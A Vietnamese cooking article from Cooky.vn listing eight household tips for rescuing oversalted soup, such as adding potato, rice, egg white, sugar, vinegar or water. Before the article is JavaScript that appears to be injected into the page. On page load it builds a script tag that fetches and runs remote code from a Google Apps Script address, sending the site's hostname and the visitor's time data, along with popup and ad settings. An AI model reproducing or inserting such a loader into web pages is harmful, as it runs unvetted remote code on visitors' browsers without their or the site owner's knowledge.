var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Mẹo Chữa Canh Bị Mặn Hiệu Quả Với Nguyên Liệu Sẵn Có Trong Bếp | Cooky.vn

Những lần nấu canh chẳng may nêm quá tay khiến nồi canh bị mặn và chị em không biết làm sao để nồi canh bớt mặn và thơm ngon trở lại nếu không muốn cả nồi canh vừa nấu. Cooky mang đến 8 mẹo chữa canh bị mặn đơn giản với những nguyên liệu có sẵn trong căn bếp nhà bạn. Chắc chắn nồi canh sẽ ngon lành trở lại ngay.

1. Dùng khoai tây

Tinh bột từ khoai tây có tác dụng làm bớt vị mặn có trong canh vì chúng sẽ hút hết chúng vào mình.

Bạn chỉ cần cắt vài lát khoai tây đã gọt vỏ rồi cho vào nồi canh đang bị mặn, khoai tây sẽ hút hết lượng muối dư thừa và đặc biệt không hề làm hỏng hương vị nồi canh của bạn đâu đó.

Trước khi ăn canh, bạn vớt khoai tây ra và thưởng thức ngay thôi nào.

Mẹo chữa canh bị mặn bằng nguyên liệu có sẵn

2. Dùng cơm trắng

Chắc hẳn bạn chưa từng nghe đến cơm trắng có thể làm giảm độ mặn của canh có phải không nào. Thực chất dùng cơm trắng mang lại hiệu quả cực kì tốt luôn đó.

Bạn chỉ cần cho cơm đã nấu chín vào một miếng vải sạch, buộc chặt lại, sau đó thả vào nồi canh và để trong vài phút. Tinh chất bột từ cơm sẽ hút bớt lượng muối làm mặn, trả lại nồi canh thơm ngon như lúc ban đầu.

Lúc ăn, bạn lấy cơm ra, nêm nếm lại cho hợp vị một chút là ăn được ngay rồi.

Mẹo chữa canh bị mặn bằng nguyên liệu có sẵn

3. Dùng lòng trắng trứng

Dùng cơm làm giảm độ mặn của canh đã lạ, dùng lòng trắng trứng chắc hẳn còn khiến bạn thấy ngộ hơn nữa phải không nào. Thực ra, các chất có trong lòng trắng trứng có tác dụng làm giảm bớt độ mặn của canh.

Chỉ cần cho một lòng trắng trứng gà sống vào nồi canh bị mặn rồi đun sôi canh một lần nữa. Lòng trắng sẽ giúp hấp thụ lượng muối thừa ra là nguyên nhân làm canh bị mặn và canh sẽ nhạt lại bớt.

Nếu bạn không muốn có trứng trong canh có thể dùng muỗng vớt lòng trắng ra rồi ăn. Còn nếu đang nấu nồi canh xương hay canh thập cẩm, lấy muỗng múc hết cái trong canh ra rồi cho lòng trắng trứng vào, đun sôi 15 phút. Sau đó vớt hết trứng nổi trên bề mặt và cho phần cái vào lại nồi, đun lại là được. Dùng cách này canh bạn vừa không còn bị mặn vừa không còn cặn lòng trắng.

Mẹo chữa canh bị mặn bằng nguyên liệu có sẵn

4. Nêm thêm đường

Đây chắc hẳn là cách chị em hay làm nhất khi gặp phải nồi canh mặn. Dùng đường để làm giảm độ mặn của canh, chất ngọt của đường sẽ giúp canh hết mặn.

Nêm một chút đường vào canh nhưng không nên cho quá nhiều vì sẽ làm thay đổi hương vị món canh của bạn.

Mẹo chữa canh bị mặn bằng nguyên liệu có sẵn

>> Xem thêm: Những lợi ích cực hay từ đường trắng

5. Dùng một chút mật ong

Ngoài dùng đường để canh bớt mặn, bạn có thể cho mật ong vào canh để hòa tan bớt lượng muối dư thừa.

Cho một chút mật ong vào nồi canh nhưng không nên nêm nhiều vì mật ong có thể thay đổi hương vị món canh một chút.

Mẹo chữa canh bị mặn bằng nguyên liệu có sẵn

6. Dùng giấm làm giảm độ mặn

Giấm có tính chua sẽ giúp canh bớt mặn ngay lập tức.

Chỉ cần một lượng nhỏ giấm là đã phát huy tác dụng. Khi canh bị mặn, nêm từ từ giấm vào, vừa nêm vừa nếm đến khi cảm thấy canh đã vừa miệng không còn mặn và không có vị lạ.

Bạn cũng nhớ là đừng cho quá nhiều giấm nha vì món ăn sẽ mất đi hương vị thơm ngon đó.

Mẹo chữa canh bị mặn bằng nguyên liệu có sẵn

7. Vắt một tí chanh

Cũng giống như giấm, chất chua của chanh có tác dụng trung hòa vị mặn trong canh.

Bạn chỉ cần vắt một tí chanh vào, khuấy đều là được. Không nên cho lượng nước chanh quá nhiều trong một lần mà vừa nêm vừa xem xem canh đã vừa chưa, nếu không sẽ ảnh hưởng đến vị ngon của món canh.

Mẹo chữa canh bị mặn bằng nguyên liệu có sẵn

8. Thêm nước

Thêm nước vào canh có lẽ là giải pháp cuối cùng nếu như bạn không nắm chắc những mẹo trên và đây cũng là cách làm thường xuyên nhất của chị em nội trợ.

Mặc dù cách này sẽ làm loãng nồi canh, hương vị sẽ thay đổi và bạn phải nêm lại một chút để vừa miệng.

Mẹo chữa canh bị mặn bằng nguyên liệu có sẵn

Đã có cách chữa canh bị mặn rồi, bạn có thể tự tin nấu những món canh bổ dưỡng, ngon lành cho bữa cơm của gia đình với cách nấu canh như Canh đậu hũ nấu nấm, Canh chua cá diêu hồng, Canh sườn sụn rau củ, Canh nghêu nấu đậu hũ rong biển,… mà không phải lo lắng gì nữa.

Mẹo chữa canh bị mặn bằng nguyên liệu có sẵn

Chúc các bạn thành công với những mẹo chữa canh bị mặn!

>>> Xem thêm: Những món canh hấp dẫn, nóng hổi cho mâm cơm

Có thể bạn quan tâm:

  • Những món ăn ngon cho bữa cơm gia đình
  • Dùng nước luộc gà để nấu canh rau cải: Nên hay không?
  • Vì sao bạn không nên chan canh vào cơm khi ăn?